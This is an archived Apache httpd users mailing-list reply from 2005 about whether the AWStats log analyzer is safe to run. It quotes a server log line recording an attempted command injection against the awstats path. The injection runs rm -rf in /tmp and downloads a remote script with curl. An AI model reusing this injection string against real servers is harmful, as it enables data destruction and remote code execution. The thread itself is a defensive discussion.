httpd-users mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From Krist van Besien <>
Subject Re: [users@httpd] Can Anyone Recommend A Log Analyzer?
Date Tue, 15 Nov 2005 15:53:25 GMT
On 11/12/05, David P. Donahue <> wrote:
> >
> Looks good.  One thing that concerns me, though.  The name sounded
> familiar because of some attempts made on my web server from time to
> time.  I notice entries like the following in my logs (sorry for any
> wrapping):
> - - [13/Sep/2005:10:52:04 -0400]
> "GET
> /awstats/|echo%20;cd%20/tmp;rm%20-rf%20*;curl%20-O%20;;echo%20;*;echo|
> HTTP/1.1" 404 12682 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
> On one such occasion I even went and downloaded the PERL script to which
> it links and looked through the code.  Pretty unsettling.  As with any
> service, security is always a concern.  But it concerned me that attacks
> were being directed at this awstats package.
> Is there anything I should know before just loading it up and running it?

Awstats works good. I you have concerns about securty just don't use
the cgi interface. Have a cron job build static reports.


Solothurn, Switzerland

The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:> for more info.
To unsubscribe, e-mail:
   "   from the digest:
For additional commands, e-mail:

View raw message